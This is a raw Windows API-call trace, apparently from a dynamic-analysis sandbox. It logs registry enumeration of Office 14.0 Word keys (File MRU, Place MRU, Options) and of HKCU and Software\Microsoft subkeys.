[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.572] CoTaskMemFree (pv=0x2baf50)
[0086.572] CoTaskMemFree (pv=0x0)
[0086.572] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.572] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.573] CoTaskMemFree (pv=0x2baf50)
[0086.573] CoTaskMemFree (pv=0x0)
[0086.573] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x3e0) returned 0x0
[0086.573] RegCloseKey (hKey=0x40c) returned 0x0
[0086.573] RegQueryInfoKeyW (in: hKey=0x3e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.573] CoTaskMemFree (pv=0x0)
[0086.573] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.573] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.573] CoTaskMemFree (pv=0x2baf50)
[0086.573] CoTaskMemFree (pv=0x0)
[0086.573] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.573] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.573] CoTaskMemFree (pv=0x2baf50)
[0086.573] CoTaskMemFree (pv=0x0)
[0086.574] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.574] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.574] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca18 | out: phkResult=0x1c81ca18*=0x40c) returned 0x0
[0086.575] RegCloseKey (hKey=0x3e0) returned 0x0
[0086.575] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c93c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c93c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c938*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c9c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81c9c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x0) returned 0x2
[0086.575] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.575] CoTaskMemFree (pv=0x2baf50)
[0086.575] CoTaskMemFree (pv=0x0)
[0086.575] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.575] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.576] CoTaskMemFree (pv=0x2baf50)
[0086.576] CoTaskMemFree (pv=0x0)
[0086.576] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.576] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x3e0) returned 0x0
[0086.577] RegQueryInfoKeyW (in: hKey=0x3e0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.577] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.577] CoTaskMemFree (pv=0x2baf50)
[0086.577] CoTaskMemFree (pv=0x0)
[0086.577] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] CoTaskMemFree (pv=0x2baf50)
[0086.578] CoTaskMemFree (pv=0x0)
[0086.578] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] CoTaskMemFree (pv=0x2baf50)
[0086.578] CoTaskMemFree (pv=0x0)
[0086.578] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] CoTaskMemFree (pv=0x2baf50)
[0086.578] CoTaskMemFree (pv=0x0)
[0086.578] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] CoTaskMemFree (pv=0x2baf50)
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] RegEnumKeyExW (in: hKey=0x3e0, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] RegOpenKeyExW (in: hKey=0x3e0, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81caf8 | out: phkResult=0x1c81caf8*=0x394) returned 0x0
[0086.578] RegCloseKey (hKey=0x3e0) returned 0x0
[0086.578] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81ca1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81ca1c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81ca18*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.578] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.579] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xe, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IAM", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0xf, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IME", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x10, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IMEJP", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x11, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Connection Wizard", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x12, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.580] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x13, lpName=0x2baf50, lpcchName=0x1c81caa8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Mail and News", lpcchName=0x1c81caa8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
